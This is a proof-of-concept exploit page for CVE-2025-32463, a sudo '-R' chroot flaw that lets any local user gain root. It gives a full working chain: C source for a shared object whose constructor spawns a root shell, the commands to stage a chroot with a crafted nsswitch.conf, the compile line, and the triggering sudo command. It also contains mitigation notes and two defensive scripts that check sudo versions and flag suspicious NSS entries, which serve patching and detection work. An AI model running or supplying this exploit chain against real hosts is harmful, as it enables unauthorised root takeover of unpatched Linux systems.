PoC details: 74794a0b6dd79df57705c7cd2d11ac5238e7ab46

Source
Related vulnerability
Title: Sudo security vulnerability (CVE-2025-32463)
Description: Sudo is a program for Unix-like systems that allows users to run commands with elevated privileges in a controlled way. Sudo versions before 1.9.17p1 contain a security vulnerability: the use of /etc/nsswitch.conf from a user-controlled directory can lead to root access.
Description
A PoC exploit for CVE-2025-32463 - Sudo Privilege Escalation
Introduction
# CVE-2025-32463 - Sudo Privilege Escalation

A privilege escalation vulnerability exists in `sudo` on Linux/Unix-based systems. When `sudo` is invoked with the `-R` (`--chroot`) option it enters the **user-supplied chroot directory** before resolving the command and, while inside it, performs user/group lookups through glibc's Name Service Switch (NSS). glibc then reads `/etc/nsswitch.conf` from the attacker-controlled directory and loads the `libnss_*` shared object it names, as root.

## **Root Cause**  
- Sudo 1.9.14 introduced the `-R`/`--chroot` option. When it is used, `sudo` performs `chroot()` into the **user-supplied directory** before resolving the command and before the sudoers policy is applied.  
- While inside that directory, `sudo` resolves user and group information through glibc's **NSS (Name Service Switch)**. glibc reads `/etc/nsswitch.conf` from the chroot, which the attacker wrote, and `dlopen()`s whatever `libnss_<source>.so.2` that file names. `LD_LIBRARY_PATH` plays no part (`sudo` strips it); the library path is controlled entirely through the chroot directory and its `nsswitch.conf`.  
- The shared object's constructor therefore runs inside a process that holds **root privileges**: arbitrary code execution as root.

## **Impact**  
- Any **local** user can exploit this to **gain root privileges**; no sudoers entry for that user is required, so default configurations are affected.  

## **Mitigation**  
1. **Update `sudo`** to 1.9.17p1 or later (the upstream fix). Distributions ship the fix as a backport that keeps the older version string, so check the distribution advisory rather than only `sudo --version`.  
2. **Do not rely on sudoers restrictions.** The chroot and the NSS lookup happen before the sudoers policy is evaluated, so limiting or removing chroot privileges in `/etc/sudoers` does not stop an unpatched binary from loading the library.  
3. **Environment hardening does not help here.** `sudo` already strips `LD_LIBRARY_PATH` and `LD_PRELOAD`, and `secure_path` only controls the `PATH` used to locate the command, not where glibc loads NSS modules from; the module is chosen by the chroot's `/etc/nsswitch.conf`.  
4. **Hunt for staging artifacts** on hosts that cannot be patched immediately: `etc/nsswitch.conf` files and `libnss_` directories under world-writable locations such as `/tmp` are exactly what this PoC leaves behind.  

## **Technical Details**  
| Component       | Vulnerability trigger                                                                                   |  
|-----------------|---------------------------------------------------------------------------------------------------------|  
| **`sudo -R`**   | `chroot()` into a user-supplied directory before the sudoers policy is evaluated.                       |  
| **NSS**         | glibc reads the chroot's `/etc/nsswitch.conf` and `dlopen()`s the `libnss_<source>.so.2` it names, as root. |  
| **Exploit**     | Attacker-chosen source name → attacker-built shared object → constructor runs as root.                  |  

## Vulnerability Overview

**CVE ID**: CVE-2025-32463  
**Affected Versions**: Sudo 1.9.14 through 1.9.17 (fixed in 1.9.17p1)  
**CVSS Score**: 9.3 (Critical); the attack vector is local, so the 9.8 sometimes quoted for this CVE does not match its published vector  
**Impact**: Local privilege escalation to root  

### Attack Flow
1. Attacker builds a shared object whose constructor spawns a root shell
2. Stages a chroot directory containing an `etc/nsswitch.conf` that names that object as an NSS source
3. Runs `sudo -R <dir> <cmd>`; sudo chroots into the directory (the command need not exist)
4. sudo's user/group lookup makes glibc read the staged `nsswitch.conf` and load the attacker's object
5. The object's constructor executes with root privileges

# Exploit Steps

## Step 1: Verify vulnerability
**A quick heuristic: on an affected build the `-R` option is accepted and sudo tries to use the directory before any policy check, so a nonexistent chroot fails with `No such file or directory`:**

```
sudo -R invalid invalid
sudo: invalid: No such file or directory
```

This only shows that the chroot code path is reachable. The reliable check is `sudo --version`: builds from 1.9.14 up to and including 1.9.17 are affected, 1.9.17p1 and later carry the fix. Because distributions backport the fix without changing the upstream version string, a version in the affected range means "check the distribution advisory", not "confirmed exploitable".
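The version comparison is easy to get wrong by hand because sudo uses a `MAJOR.MINOR.PATCH[pLEVEL]` scheme where `1.9.17` is affected but `1.9.17p1` is not. The script below is an added example, not part of this PoC or of sudo: it parses a `sudo --version` banner and classifies the version against the affected range. `SAMPLE_BANNER` is constructed to look like real `sudo --version` output, and `check_local_sudo` is a helper name chosen for this example.

```shell
#!/bin/sh
# Added example (not part of the original PoC): classify a sudo version
# string against the range named in the advisory.
# Affected: 1.9.14 up to and including 1.9.17; fixed upstream in 1.9.17p1.
# Caveat: distributions backport the fix without bumping the upstream
# version, so "affected" here means "check the distro advisory".

# Constructed sample of `sudo --version` output (first line carries the version).
SAMPLE_BANNER='Sudo version 1.9.15p5
Sudoers policy plugin version 1.9.15p5
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.15p5'

# Extract "MAJOR.MINOR.PATCH[pLEVEL]" from a `sudo --version` banner.
sudo_version_from_banner() {
    printf '%s\n' "$1" | sed -n 's/^Sudo version \([0-9.p]*\).*/\1/p' | head -n 1
}

# Split "MAJOR.MINOR.PATCH[pLEVEL]" into four numbers on stdout,
# e.g. "1.9.15p5" -> "1 9 15 5" and "1.9.17" -> "1 9 17 0".
# Returns 1 on malformed input.
sudo_version_fields() {
    v=$1
    case "$v" in
        *.*.*.*|"") return 1 ;;   # too many dots, or empty
        *.*.*) ;;
        *) return 1 ;;
    esac
    major=${v%%.*}
    rest=${v#*.}
    minor=${rest%%.*}
    rest=${rest#*.}
    case "$rest" in
        *p*) patch=${rest%%p*}; plevel=${rest#*p} ;;
        *)   patch=$rest;       plevel=0 ;;
    esac
    for f in "$major" "$minor" "$patch" "$plevel"; do
        case "$f" in ""|*[!0-9]*) return 1 ;; esac
    done
    printf '%s %s %s %s\n' "$major" "$minor" "$patch" "$plevel"
}

# Exit status 0 if the version is inside the affected range, 1 if outside,
# 2 if the string could not be parsed.
sudo_version_affected() {
    fields=$(sudo_version_fields "$1") || return 2
    set -- $fields
    major=$1 minor=$2 patch=$3 plevel=$4
    [ "$major" -eq 1 ] && [ "$minor" -eq 9 ] || return 1     # only the 1.9 series
    [ "$patch" -ge 14 ] && [ "$patch" -le 17 ] || return 1   # chroot support arrived in 1.9.14
    [ "$patch" -eq 17 ] && [ "$plevel" -ge 1 ] && return 1   # 1.9.17p1 carries the fix
    return 0
}

# Human-readable verdict for a banner; exit status mirrors sudo_version_affected.
sudo_report() {
    ver=$(sudo_version_from_banner "$1")
    if [ -z "$ver" ]; then
        echo "could not find a version line in the banner"
        return 2
    fi
    if sudo_version_affected "$ver"; then
        echo "sudo $ver: inside the affected range 1.9.14-1.9.17 (fix: 1.9.17p1)"
    else
        echo "sudo $ver: outside the affected range"
        return 1
    fi
}

# Check the sudo installed on this machine, if any (helper name assumed for this example).
check_local_sudo() {
    command -v sudo >/dev/null 2>&1 || { echo "sudo not installed"; return 2; }
    sudo_report "$(sudo --version 2>/dev/null)"
}

sudo_report "$SAMPLE_BANNER"
```

Run `check_local_sudo` on the host under test; a non-zero exit status means "outside the range" (1) or "could not parse" (2), so the function can sit directly in a fleet-wide inventory script.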

## Step 2: Create Temporary Workspace

**First, we create a temporary directory to work in:**
```bash
TMP_DIR=$(mktemp -d -t sudobridge.XXXXXX)
cd "$TMP_DIR"
```
This creates a uniquely named temporary directory and changes into it. `mktemp` guarantees a fresh directory, so the staging files do not collide with anything already on the system; the path is quoted so the later steps still work if the temporary directory contains spaces.

## Step 3: Create Malicious Library

**We need to create a C file (bridge90.c) that will be compiled into a malicious library:**
```c
#include <stdlib.h>
#include <unistd.h>

/* Runs as soon as glibc dlopen()s this object inside the root-privileged
 * sudo process; nothing in it ever has to be called explicitly. */
__attribute__((constructor)) void bridge(void) {
  setreuid(0,0);  // Set real and effective user ID to root
  setregid(0,0);  // Set real and effective group ID to root
  chdir("/");     // Change to root directory
  execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);  // Execute shell
}
```
**Key components:**

- `__attribute__((constructor))` ensures the function runs as soon as the library is loaded
- `setreuid` and `setregid` set both the real and effective IDs to root
- `execl` spawns a bash shell

## Step 4: Setup Exploit Environment
```bash
mkdir -p bridge/etc
echo "passwd: /bridge90" > bridge/etc/nsswitch.conf
cp /etc/group bridge/etc/
mkdir libnss_
gcc -shared -fPIC -Wl,-init,bridge -o libnss_/bridge90.so.2 bridge90.c
```
**Breakdown:**

- `bridge/` is the directory handed to `-R`; `bridge/etc/nsswitch.conf` is the file glibc reads once sudo has chrooted into it
- `passwd: /bridge90` names the NSS source for the passwd database. glibc turns a source name into `libnss_<source>.so.2`, so this one becomes `libnss_/bridge90.so.2`; because that name contains a slash, the dynamic loader opens it as a path instead of searching the library directories
- The real `/etc/group` is copied in so that group lookups inside the chroot do not fail before the passwd lookup is reached
- `libnss_/` is created in the working directory (`$TMP_DIR`), not inside `bridge/`, because the relative path is resolved against sudo's current directory at the time of the lookup
- `gcc` compiles the constructor into `libnss_/bridge90.so.2`; `-Wl,-init,bridge` additionally registers `bridge` as the object's init function, so it runs on load even without the constructor attribute
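Why the object lands at `libnss_/bridge90.so.2` is easier to see by running the naming rule over a whole `nsswitch.conf`. The script below is an added example, not part of this PoC or of sudo/glibc: it derives the `libnss_<source>.so.2` object name for every source in a constructed sample file (a stock-looking config with the PoC's `passwd: /bridge90` line appended) and flags the sources whose name contains a slash, which the dynamic loader opens as a path rather than searching the library directories. The naming rule is glibc's; the function names and the sample file are this example's own.

```shell
#!/bin/sh
# Added example (not part of the original PoC): list what glibc's NSS would
# dlopen() for each source in an nsswitch.conf and flag sources whose object
# name contains '/'.  glibc builds the name as "libnss_<source>.so.2"; a name
# with a slash is opened as a path (relative to the current directory when it
# has no leading '/'), which is why "passwd: /bridge90" resolves to
# ./libnss_/bridge90.so.2 rather than to anything under /lib.

# Constructed sample: a Debian-style file with the PoC's line spliced in.
SAMPLE_NSSWITCH='# /etc/nsswitch.conf
passwd:         files systemd
group:          files systemd
shadow:         files
hosts:          files mdns4_minimal [NOTFOUND=return] dns
networks:       files
passwd:         /bridge90
'

# Print one line per database source: "<db> <source> <object> <verdict>".
# verdict is "search" (loader searches the library directories) or
# "PATH" (loader opens the name as a file path).
nss_objects() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*(#|$)/ { next }           # comments and blank lines
        {
            line = $0
            sub(/#.*/, "", line)                 # strip a trailing comment
            n = index(line, ":")
            if (n == 0) next
            db = substr(line, 1, n - 1)
            gsub(/[[:space:]]/, "", db)
            m = split(substr(line, n + 1), tok, " ")
            for (i = 1; i <= m; i++) {
                t = tok[i]
                # skip action specifications such as [NOTFOUND=return]
                if (t ~ /^\[/ || t ~ /\]$/ || index(t, "=") > 0) continue
                obj = "libnss_" t ".so.2"
                verdict = (index(t, "/") > 0) ? "PATH" : "search"
                print db, t, obj, verdict
            }
        }'
}

# Number of sources the loader would open as an explicit path; anything
# above zero in a file found outside /etc deserves a closer look.
nss_path_sources() {
    nss_objects "$1" | awk '$4 == "PATH" { c++ } END { print c + 0 }'
}

nss_objects "$SAMPLE_NSSWITCH"
echo "path-like sources: $(nss_path_sources "$SAMPLE_NSSWITCH")"
```

Pointed at a staged chroot (`nss_objects "$(cat /tmp/something/etc/nsswitch.conf)"`), the `PATH` verdict is the unambiguous sign of this technique; a plain source name such as `files` is still resolved against the library directories of whatever root the process has at lookup time, so a bare name is not proof of a clean file.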

## Step 5: Execute the Exploit

`sudo -R bridge bridge`

This command turns the staged environment into a root shell:

- The first `bridge` is the chroot directory containing the crafted `etc/nsswitch.conf`
- The second `bridge` is the command to run. It does not need to exist: sudo chroots into `bridge/` to resolve it and, before it can report that the command is missing, performs an NSS lookup that loads `libnss_/bridge90.so.2` and runs its constructor as root

## Step 6: Verify Privilege Escalation

**After successful exploitation, verify root access:**

```bash
whoami    # Should return "root"
id -u     # Should return "0" (root's UID)
```


```mermaid
graph LR
    A[Malicious libnss_ object] --> B[Staged chroot with nsswitch.conf]
    B --> C[sudo -R enters chroot]
    C --> D[NSS lookup loads object]
    D --> E[Constructor runs as root]
```

# Disclaimer

This PoC exploit is for educational purposes only! I'm not responsible for any misuse you might cause with this exploit!
File snapshot

```
/data/pocs/74794a0b6dd79df57705c7cd2d11ac5238e7ab46
├── CVE-2025-32463.sh  (4.9K)
└── README.md          (4.3K)

0 directories, 2 files
```